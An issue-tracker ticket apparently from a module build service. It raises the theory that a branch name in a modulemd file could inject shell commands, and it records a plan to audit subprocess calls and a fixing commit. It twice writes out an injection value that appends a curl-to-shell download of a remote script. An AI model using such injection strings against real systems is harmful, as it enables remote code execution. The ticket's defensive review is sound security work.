Theory: if someone crafted a modulemd file with an rpm listed in it and the branchname for that rpm was foo; curl http://threebean.org/exploit-the-box.sh | sh, we would pass that branch name through and become compromised.
foo; curl http://threebean.org/exploit-the-box.sh | sh
The purpose of this ticket is to search for all cases of shell/subprocess execution, and to ensure that we're scrubbing any input coming from modulemd files.
Note - it looks like this is not possible atm. We do not pass shell=True to subprocess.Popen().
shell=True
We should write a unit test that tries to achieve this exploit, and ensure that it fails.
Metadata Update from @ralph: - Issue assigned to ralph
See #342.
Commit 2e6e153 fixes this issue
Login to comment on this ticket.